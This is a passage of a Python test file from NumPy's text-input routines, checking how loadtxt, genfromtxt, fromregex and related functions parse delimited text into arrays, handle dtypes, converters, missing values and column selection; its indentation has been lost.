assert_array_equal(x['comment'], a)
def test_structure_unpack(self):
txt = StringIO(asbytes("M 21 72\nF 35 58"))
dt = { 'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([asbytes('M'), asbytes('F')]))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([ 72., 58.]))
def test_ndmin_keyword(self):
c = StringIO()
c.write(asbytes('1,2,3\n4,5,6'))
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = StringIO()
d.write(asbytes('0,1,2'))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = StringIO()
e.write(asbytes('0\n1\n2'))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
f = StringIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
class Testfromregex(TestCase):
def test_record(self):
c = StringIO()
c.write(asbytes('1.312 foo\n1.534 bar\n4.444 qux'))
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO()
c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO()
c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO(asbytes('1 2\n3 4'))
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
#
data = StringIO('1\n2\n3\n4\n')
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = StringIO('1,2,3,4\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','))
assert_array_equal(test, control)
def test_comments(self):
"Test the stripping of comments"
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = StringIO('# comment\n1,2,3,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
# Comment at the end of a line
data = StringIO('1,2,3,5# comment\n')
test = np.ndfromtxt(data, dtype=int, delimiter=asbytes(','), comments=asbytes('#'))
assert_equal(test, control)
def test_skiprows(self):
"Test row skipping"
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=asbytes(','))
#
data = StringIO('comment\n1,2,3,5\n')
test = np.ndfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = StringIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(StringIO(asbytes("\n".join(data))), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
warnings.filterwarnings("ignore")
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
StringIO(basestr), skip_footer=1)
# except ValueError:
# pass
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(StringIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(StringIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(StringIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
warnings.resetwarnings()
def test_header(self):
"Test retrieving a header"
data = StringIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
test = np.ndfromtxt(data, dtype=None, names=True)
control = {'gender': np.array(asbytes_nested(['M', 'F'])),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
"Test the automatic definition of the output dtype"
data = StringIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
test = np.ndfromtxt(data, dtype=None)
control = [np.array(asbytes_nested(['A', 'BCD'])),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
"Tests whether the output dtype can be uniformized"
data = StringIO('1 2 3 4\n5 6 7 8\n')
test = np.ndfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.ndfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
"Test overwriting the names of the dtype"
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.ndfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
"Check that names can be retrieved even if the line is commented out."
data = StringIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
test = np.genfromtxt(data, names=True, dtype=None)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = StringIO("""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
test = np.genfromtxt(data, names=True, dtype=None)
assert_equal(test, ctrl)
def test_autonames_and_usecols(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
"Test the combination user-defined converters and usecol"
data = StringIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3:lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
"Tests names and usecols"
data = StringIO('A B C D\n aaaa 121 45 9.1')
test = np.ndfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None, converters={'C':lambda s: 2 * int(s)})
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
"Test the conversion to datetime."
converter = {'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 02, 03), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
"Test the conversion to datetime64."
converter = {'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = StringIO('2009-02-03 12:00:00Z, 72214.0')
test = np.ndfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 02, 03), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
"Test whether unused converters are forgotten"
data = StringIO("1 21\n 3 42\n")
test = np.ndfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.ndfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x : float((asbytes('r') in x.lower() and x.split()[-1]) or
(not asbytes('r') in x.lower() and x.strip() or 0.0))
strip_per = lambda x : float((asbytes('%') in x.lower() and x.split()[0]) or
(not asbytes('%') in x.lower() and x.strip() or 0.0))
s = StringIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n" \
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(converters={2 : strip_per, 3 : strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
"Test some corner case"
s = StringIO('q1,2\nq3,4')
cnv = lambda s:float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0:cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.ndfromtxt(StringIO(dstr,),
delimiter=";", dtype=float, converters={0:float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = asbytes(""" 1; 2001-01-01
2; 2002-01-31 """)
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
#
ndtype = [('nest', [('idx', int), ('code', np.object)])]
try:
test = np.genfromtxt(StringIO(data), delimiter=";",
dtype=ndtype, converters=converters)
except NotImplementedError:
pass
else:
errmsg = "Nested dtype involving objects should be supported."
raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = StringIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = StringIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[ 1., 2., 3., 4., 5.],
[ 6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(StringIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = StringIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(StringIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = StringIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(StringIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = StringIO("""JOE 70.1 25.3\nBOB 60.5 27.9""")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(data, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(test['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(StringIO("1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(StringIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
warnings.filterwarnings("ignore", message="genfromtxt: Empty input file:")
data = StringIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = StringIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = StringIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(StringIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 1:-99, 2:-999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(StringIO(data),
missing_values={0:-9, 'B':-99, 'C':-999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0:"N/A", 'b':" ", 2:"???"},
filling_values={0:0, 'b':0, 2:-999})
test = np.genfromtxt(StringIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(StringIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = StringIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = StringIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = StringIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = StringIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = StringIO("\n".join(data))
converters = {4: lambda x:"(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(StringIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(StringIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(StringIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(StringIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(StringIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(StringIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(StringIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = "1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values= -999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(StringIO(data), **kwargs)
assert_equal(test, ctrl)
def test_recfromtxt(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = StringIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = StringIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
